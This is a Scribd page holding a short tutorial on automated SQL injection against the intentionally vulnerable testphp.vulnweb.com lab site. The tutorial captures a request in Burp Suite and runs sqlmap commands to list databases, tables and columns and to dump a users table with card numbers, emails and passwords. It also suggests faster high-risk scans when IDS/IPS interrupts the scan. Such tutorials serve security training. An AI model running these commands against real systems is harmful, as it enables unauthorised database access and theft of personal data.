Scribd Logo
Upload

Welcome to Scribd!

  • 13 views

    05 - 1 - Automated SQL Injection

    Uploaded by

    meahe512
    This document summarizes how to perform SQL injection using Burp Suite. It outlines steps to intercept requests in Burp Suite, use single quotes to test for SQL injection vulnerabilities, extract the request to a file, and use sqlmap to find databases, tables, columns, and dump table entries by automating the SQL injection. The document cautions that scans may get aborted due to IDS/IPS, so it recommends using faster scanning techniques at a higher risk level.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content

    You might also like

    05 - 1 - Automated SQL Injection

    Uploaded by

    meahe512
    13 views8 pages
    This document summarizes how to perform SQL injection using Burp Suite. It outlines steps to intercept requests in Burp Suite, use single quotes to test for SQL injection vulnerabilities, extract the request to a file, and use sqlmap to find databases, tables, columns, and dump table entries by automating the SQL injection. The document cautions that scans may get aborted due to IDS/IPS, so it recommends using faster scanning techniques at a higher risk level.

    Original Description:

    Original Title

    05_1_Automated SQL Injection

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document summarizes how to perform SQL injection using Burp Suite. It outlines steps to intercept requests in Burp Suite, use single quotes to test for SQL injection vulnerabilities, extract the request to a file, and use sqlmap to find databases, tables, columns, and dump table entries by automating the SQL injection. The document cautions that scans may get aborted due to IDS/IPS, so it recommends using faster scanning techniques at a higher risk level.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as docx, pdf, or txt
    13 views8 pages

    05 - 1 - Automated SQL Injection

    Uploaded by

    meahe512
    This document summarizes how to perform SQL injection using Burp Suite. It outlines steps to intercept requests in Burp Suite, use single quotes to test for SQL injection vulnerabilities, extract the request to a file, and use sqlmap to find databases, tables, columns, and dump table entries by automating the SQL injection. The document cautions that scans may get aborted due to IDS/IPS, so it recommends using faster scanning techniques at a higher risk level.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as docx, pdf, or txt
    of 8

    SQL Injection

    —Use ‘ ‘ to show SQL injection Vulnerability

    —Use burp suite to do SQL injection

    --Follow the steps below

    First use ' ' to show that search option is vulnerable on http://testphp.vulnweb.com on any browser
    like firefox

    then
    Intercept the request in burp suite and send it to the repeater.
    Steps are --
    Open Burp Suite
    Open Browser

    On the Browser open http://testphp.vulnweb.com and then click forward(on left side on burp
    suite). and then you will see the web is opened up. Then use ‘ ‘ to generate a query (on search
    art) then again click on forward(on left side on burp suite). You should be able to see page as
    seen on screenshot
    Copy the request to file say at ~/request.txt

    Then use the file to do automated SQL injection

    Open Terminal

    sudo su -
    sqlmap -r /home/kali/request.txt –dbs

    Result

    sqlmap -r /home/kali/request.txt -D acuart --tables

    Most of the time the scan gets aborted in between. This is because of the IDS and IPS working
    on the server side. So use a faster method to scan, which is given below.

    OR

    use a faster method but this will risk detection.

    sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --batch --risk 3 --


    technique=U -D acuart --tables

    Then find the columns using command below

    sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --batch --risk 3 --


    technique=U -D acuart -T users –columns

    Output

    likewise you can get columns in the product table

    sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --batch --risk 3 --


    technique=U -D acuart -T products - - columns
    Now use the following command to get the entries in all the columns

    sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --batch --risk 3 --


    technique=U -D acuart -T users –C address,cart,cc,email,name,pass,phone,uname --dump

    Output

    You might also like